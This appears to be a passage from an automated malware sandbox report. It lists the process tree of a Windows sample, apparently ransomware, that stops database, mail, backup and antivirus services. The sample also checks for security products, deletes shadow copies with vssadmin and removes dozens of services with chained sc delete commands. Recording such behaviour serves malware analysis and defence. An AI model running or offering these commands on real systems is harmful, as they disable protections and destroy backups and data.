C:\Windows\system32\net1 stop SQLAgent$MSFW
4⤵
PID:5036

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:5396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:4836

C:\Windows\SysWOW64\net.exe
net stop ReportServer$ISARS
3⤵
PID:4084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$ISARS
4⤵
PID:1172

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:2228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:6012

C:\Windows\SysWOW64\net.exe
net stop WinDefend
3⤵
PID:3968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:3196

C:\Windows\SysWOW64\net.exe
net stop mr2kserv
3⤵
PID:2840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mr2kserv
4⤵
PID:2216

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
3⤵
PID:404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
4⤵
PID:3100

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFBA
3⤵
PID:504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFBA
4⤵
PID:1728

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
3⤵
PID:3416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
4⤵
PID:2944

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA
3⤵
PID:3916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA
4⤵
PID:4160

C:\Windows\SysWOW64\net.exe
net stop ShadowProtectSvc
3⤵
PID:720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShadowProtectSvc
4⤵
PID:4512

C:\Windows\SysWOW64\net.exe
net stop SPAdminV4
3⤵
PID:4484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPAdminV4
4⤵
PID:3596

C:\Windows\SysWOW64\net.exe
net stop SPTimerV4
3⤵
PID:2124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTimerV4
4⤵
PID:6044

C:\Windows\SysWOW64\net.exe
net stop SPTraceV4
3⤵
PID:4036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTraceV4
4⤵
PID:5768

C:\Windows\SysWOW64\net.exe
net stop SPUserCodeV4
3⤵
PID:5340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
4⤵
PID:2164

C:\Windows\SysWOW64\net.exe
net stop SPWriterV4
3⤵
PID:5908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPWriterV4
4⤵
PID:5628

C:\Windows\SysWOW64\net.exe
net stop SPSearch4
3⤵
PID:6072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPSearch4
4⤵
PID:4944

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:5708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:6056

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:5916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:2820

C:\Windows\SysWOW64\net.exe
net stop firebirdguardiandefaultinstance
3⤵
PID:5808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
4⤵
PID:5848

C:\Windows\SysWOW64\net.exe
net stop ibmiasrw
3⤵
PID:1756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ibmiasrw
4⤵
PID:5584

C:\Windows\SysWOW64\net.exe
net stop QBCFMonitorService
3⤵
PID:5604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService
4⤵
PID:4436

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:4052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:6052

C:\Windows\SysWOW64\net.exe
net stop QBPOSDBServiceV12
3⤵
PID:6032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBPOSDBServiceV12
4⤵
PID:5368

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
3⤵
PID:4380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
4⤵
PID:5968

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
3⤵
PID:5608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
4⤵
PID:5648

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:5284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:1580

C:\Windows\SysWOW64\net.exe
net stop "Simply Accounting Database Connection Manager"
3⤵
PID:324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
4⤵
PID:5304

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB1
3⤵
PID:5588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB1
4⤵
PID:524

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB2
3⤵
PID:4992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB2
4⤵
PID:5416

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB3
3⤵
PID:5688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB3
4⤵
PID:3792

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB4
3⤵
PID:5620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB4
4⤵
PID:5928

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB5
3⤵
PID:5824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB5
4⤵
PID:5752

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im UniFi.exe
3⤵
- Kills process with taskkill
PID:2016

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq MsMpEng.exe"
3⤵
- Enumerates processes with tasklist
PID:3884

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:4856

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq ntrtscan.exe"
3⤵
- Enumerates processes with tasklist
PID:356

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:5456

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq avp.exe"
3⤵
- Enumerates processes with tasklist
PID:1436

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:5948

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq WRSA.exe"
3⤵
- Enumerates processes with tasklist
PID:5852

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:5156

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq egui.exe"
3⤵
- Enumerates processes with tasklist
PID:1072

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:5564

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq AvastUI.exe"
3⤵
- Enumerates processes with tasklist
PID:5504

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:5480

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4984

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
3⤵
PID:2128

C:\Windows\SysWOW64\sc.exe
sc delete "XT800Service_Personal"
4⤵
PID:3672

C:\Windows\SysWOW64\sc.exe
sc delete SQLSERVERAGENT
4⤵
PID:5412

C:\Windows\SysWOW64\sc.exe
sc delete SQLWriter
4⤵
PID:4540

C:\Windows\SysWOW64\sc.exe
sc delete SQLBrowser
4⤵
PID:5580

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLFDLauncher
4⤵
PID:2536

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLSERVER
4⤵
PID:1268

C:\Windows\SysWOW64\sc.exe
sc delete QcSoftService
4⤵
PID:720

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLServerOLAPService
4⤵
PID:5388

C:\Windows\SysWOW64\sc.exe
sc delete VMTools
4⤵
PID:5520

C:\Windows\SysWOW64\sc.exe
sc delete VGAuthService
4⤵
PID:5552

C:\Windows\SysWOW64\sc.exe
sc delete MSDTC
4⤵
PID:5472

C:\Windows\SysWOW64\sc.exe
sc delete TeamViewer
4⤵
PID:4724

C:\Windows\SysWOW64\sc.exe
sc delete ReportServer
4⤵
PID:5528

C:\Windows\SysWOW64\sc.exe
sc delete RabbitMQ
4⤵
PID:5932

C:\Windows\SysWOW64\sc.exe
sc delete "AHS SERVICE"
4⤵
- Launches sc.exe
PID:2888

C:\Windows\SysWOW64\sc.exe
sc delete "Sense Shield Service"
4⤵
PID:4932

C:\Windows\SysWOW64\sc.exe
sc delete SSMonitorService
4⤵
- Launches sc.exe
PID:5988

C:\Windows\SysWOW64\sc.exe
sc delete SSSyncService
4⤵
PID:268

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdAppService1300
4⤵
PID:4740

C:\Windows\SysWOW64\sc.exe
sc delete MSSQL$SQL2008
4⤵
PID:2484

C:\Windows\SysWOW64\sc.exe
sc delete SQLAgent$SQL2008
4⤵
PID:2376

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdTaskService1300
4⤵
PID:5764

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdUpgradeService1300
4⤵
PID:2204

C:\Windows\SysWOW64\sc.exe
sc delete VirboxWebServer
4⤵
PID:5232

C:\Windows\SysWOW64\sc.exe
sc delete jhi_service
4⤵
PID:3468

C:\Windows\SysWOW64\sc.exe
sc delete LMS
4⤵
PID:5244

C:\Windows\SysWOW64\sc.exe
sc delete "FontCache3.0.0.0"
4⤵
PID:356

C:\Windows\SysWOW64\sc.exe
sc delete "OSP Service"
4⤵
PID:5864

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
3⤵
PID:208

C:\Windows\SysWOW64\sc.exe
sc delete "DAService_TCP"
4⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete "eCard-TTransServer"
4⤵
PID:5016

C:\Windows\SysWOW64\sc.exe
sc delete eCardMPService
4⤵
PID:5884

C:\Windows\SysWOW64\sc.exe
sc delete EnergyDataService
4⤵
PID:512

C:\Windows\SysWOW64\sc.exe
sc delete UI0Detect
4⤵
- Launches sc.exe
PID:2840

C:\Windows\SysWOW64\sc.exe
sc delete K3MobileService
4⤵
PID:5380

C:\Windows\SysWOW64\sc.exe
sc delete TCPIDDAService
4⤵
PID:5436

C:\Windows\SysWOW64\sc.exe
sc delete WebAttendServer
4⤵
PID:5420

C:\Windows\SysWOW64\sc.exe
sc delete UIODetect
4⤵
PID:4436

C:\Windows\SysWOW64\sc.exe
sc delete "wanxiao-monitor"
4⤵
PID:5368

C:\Windows\SysWOW64\sc.exe
sc delete VMAuthdService
4⤵
- Launches sc.exe
PID:5328

C:\Windows\SysWOW64\sc.exe
sc delete VMUSBArbService
4⤵
PID:5428

C:\Windows\SysWOW64\sc.exe
sc delete VMwareHostd
4⤵
PID:5488

C:\Windows\SysWOW64\sc.exe
sc delete "vm-agent"
4⤵
PID:1652

C:\Windows\SysWOW64\sc.exe
sc delete VmAgentDaemon
4⤵
PID:2496

C:\Windows\SysWOW64\sc.exe
sc delete OpenSSHd
4⤵
PID:1248

C:\Windows\SysWOW64\sc.exe
sc delete eSightService
4⤵
PID:4804

C:\Windows\SysWOW64\sc.exe
sc delete apachezt
4⤵
PID:4836

C:\Windows\SysWOW64\sc.exe
sc delete Jenkins
4⤵
PID:4072

C:\Windows\SysWOW64\sc.exe
sc delete secbizsrv
4⤵
- Launches sc.exe
PID:3224

C:\Windows\SysWOW64\sc.exe
sc delete SQLTELEMETRY
4⤵
- Launches sc.exe
PID:5768

C:\Windows\SysWOW64\sc.exe
sc delete MSMQ
4⤵
PID:5664

C:\Windows\SysWOW64\sc.exe
sc delete smtpsvrJT
4⤵
PID:1360

C:\Windows\SysWOW64\sc.exe
sc delete zyb_sync
4⤵
- Launches sc.exe
PID:4424

C:\Windows\SysWOW64\sc.exe
sc delete 360EntHttpServer
4⤵
PID:5748

C:\Windows\SysWOW64\sc.exe
sc delete 360EntSvc
4⤵
- Launches sc.exe
PID:5432

C:\Windows\SysWOW64\sc.exe
sc delete 360EntClientSvc
4⤵
PID:5132

C:\Windows\SysWOW64\sc.exe
sc delete NFWebServer
4⤵
PID:5504

C:\Windows\SysWOW64\sc.exe
sc delete wampapache
4⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete MSSEARCH
4⤵
PID:2888

C:\Windows\SysWOW64\sc.exe
sc delete msftesql
4⤵
PID:5188

C:\Windows\SysWOW64\sc.exe
sc delete "SyncBASE Service"
4⤵
PID:1696

C:\Windows\SysWOW64\sc.exe
sc delete OracleDBConcoleorcl
4⤵
- Launches sc.exe
PID:5968

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
4⤵
PID:4808

C:\Windows\SysWOW64\sc.exe
sc delete OracleMTSRecoveryService
4⤵
PID:5148

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
3⤵
PID:5992

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1ClrAgent
4⤵
PID:1020

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1TNSListener
4⤵
- Launches sc.exe
PID:4204

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
4⤵
PID:4440

C:\Windows\SysWOW64\sc.exe
sc delete OracleServiceORCL
4⤵
PID:68

C:\Windows\SysWOW64\sc.exe
sc delete aspnet_state @sc delete Redis
4⤵
PID:1308

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
4⤵
PID:2124

C:\Windows\SysWOW64\sc.exe
sc delete JhTask
4⤵
PID:5960

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
4⤵
PID:5372

C:\Windows\SysWOW64\sc.exe
sc delete XT800Service_Personal
4⤵
- Launches sc.exe
PID:3872

C:\Windows\SysWOW64\sc.exe
sc delete MCService
4⤵
- Launches sc.exe
PID:5844

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
4⤵
PID:6048

C:\Windows\SysWOW64\sc.exe
sc delete allpass_redisservice_port21160
4⤵
- Launches sc.exe
PID:3428

C:\Windows\SysWOW64\sc.exe
sc delete "Flash Helper Service"
4⤵
PID:272

C:\Windows\SysWOW64\sc.exe
sc delete "Kiwi Syslog Server"
4⤵
PID:1016

C:\Windows\SysWOW64\sc.exe
sc delete "UWS HiPriv Services"
4⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
3⤵
PID:2432

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService1
4⤵
PID:5996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService1
5⤵
PID:1676

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService2
4⤵
PID:3240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService2
5⤵
PID:3644

C:\Windows\SysWOW64\net.exe
net stop "memcached Server"
4⤵
PID:5560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "memcached Server"
5⤵
PID:960

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
4⤵
PID:5780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
5⤵
PID:5636

C:\Windows\SysWOW64\net.exe
net stop UFIDAWebService
4⤵
PID:5836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UFIDAWebService
5⤵
PID:3548

C:\Windows\SysWOW64\net.exe
net stop MSComplianceAudit
4⤵
PID:5524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSComplianceAudit
5⤵
PID:2096

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
4⤵
PID:3788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
5⤵
PID:3104

C:\Windows\SysWOW64\net.exe
net stop MSExchangeAntispamUpdate
4⤵
PID:432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
5⤵
PID:4204

C:\Windows\SysWOW64\net.exe
net stop MSExchangeCompliance
4⤵
PID:5400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeCompliance
5⤵
PID:3944

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDagMgmt
4⤵
PID:6064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDagMgmt
5⤵
PID:4484

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDelivery
4⤵
PID:4864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDelivery
5⤵
PID:5816

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDiagnostics
4⤵
PID:5740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDiagnostics
5⤵
PID:5844

C:\Windows\SysWOW64\net.exe
net stop MSExchangeEdgeSync
4⤵
PID:288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeEdgeSync
5⤵
PID:3296

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFastSearch
4⤵
PID:3104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFastSearch
5⤵
PID:5696

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFrontEndTransport
4⤵
PID:5700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
5⤵
PID:1172

C:\Windows\SysWOW64\net.exe
net stop MSExchangeHM
4⤵
PID:3240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeHM
5⤵
PID:2668

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL2008
4⤵
PID:4944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL2008
5⤵
PID:668

C:\Windows\SysWOW64\net.exe
net stop MSExchangeHMRecovery
4⤵
PID:5224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeHMRecovery
5⤵
PID:5520

C:\Windows\SysWOW64\net.exe
net stop MSExchangeImap4
4⤵
PID:4164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeImap4
5⤵
PID:4864

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIMAP4BE
4⤵
PID:2100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIMAP4BE
5⤵
PID:5432

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
4⤵
PID:5660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
5⤵
PID:3824

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMailboxAssistants
4⤵
PID:4532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
5⤵
PID:5556

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMailboxReplication
4⤵
PID:5820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMailboxReplication
5⤵
PID:4180

C:\Windows\SysWOW64\net.exe
net stop MSExchangeNotificationsBroker
4⤵
PID:5732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
5⤵
PID:4836

C:\Windows\SysWOW64\net.exe
net stop MSExchangePop3
4⤵
PID:4440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangePop3
5⤵
PID:4708

C:\Windows\SysWOW64\net.exe
net stop MSExchangePOP3BE
4⤵
PID:5016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangePOP3BE
5⤵
PID:4036

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
3⤵
PID:5868

C:\Windows\SysWOW64\net.exe
net stop HaoZipSvc
4⤵
PID:4888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop HaoZipSvc
5⤵
PID:2984

C:\Windows\SysWOW64\net.exe
net stop "igfxCUIService2.0.0.0"
4⤵
PID:4304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
5⤵
PID:2488

C:\Windows\SysWOW64\net.exe
net stop Realtek11nSU
4⤵
PID:2824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Realtek11nSU
5⤵
PID:2784

C:\Windows\SysWOW64\net.exe
net stop xenlite
4⤵
PID:5320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop xenlite
5⤵
PID:4168

C:\Windows\SysWOW64\net.exe
net stop XenSvc
4⤵
PID:5928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop XenSvc
5⤵
PID:5704

C:\Windows\SysWOW64\net.exe
net stop Apache2.2
4⤵
PID:4008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.2
5⤵
PID:4984

C:\Windows\SysWOW64\net.exe
net stop "Synology Drive VSS Service x64"
4⤵
PID:2300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
5⤵
PID:5392

C:\Windows\SysWOW64\net.exe
net stop DellDRLogSvc
4⤵
PID:596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DellDRLogSvc
5⤵
PID:4084

C:\Windows\SysWOW64\net.exe
net stop FirebirdGuardianDeafaultInstance
4⤵
PID:5152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
5⤵
PID:2156

C:\Windows\SysWOW64\net.exe
net stop JWEM3DBAUTORun
4⤵
PID:6072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWEM3DBAUTORun
5⤵
PID:660

C:\Windows\SysWOW64\net.exe
net stop JWRinfoClientService
4⤵
PID:5296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWRinfoClientService
5⤵
PID:5756

C:\Windows\SysWOW64\net.exe
net stop JWService
4⤵
PID:4916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWService
5⤵
PID:6040

C:\Windows\SysWOW64\net.exe
net stop Service2
4⤵
PID:5404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Service2
5⤵
PID:5932

C:\Windows\SysWOW64\net.exe
net stop RapidRecoveryAgent
4⤵
PID:5204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RapidRecoveryAgent
5⤵
PID:2760

C:\Windows\SysWOW64\net.exe
net stop FirebirdServerDefaultInstance
4⤵
PID:5884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
5⤵
PID:3524

C:\Windows\SysWOW64\net.exe
net stop AdobeARMservice
4⤵
PID:3600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AdobeARMservice
5⤵
PID:3648

C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc
4⤵
PID:404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc
5⤵
PID:2764

C:\Windows\SysWOW64\net.exe
net stop VeeanBackupSvc
4⤵
PID:5716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeanBackupSvc
5⤵
PID:236

C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc
4⤵
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc
5⤵
PID:3728

C:\Windows\SysWOW64\net.exe
net stop TPlusStdAppService1300
4⤵
PID:3556

C:\Windows\SysWOW64\net1.exe
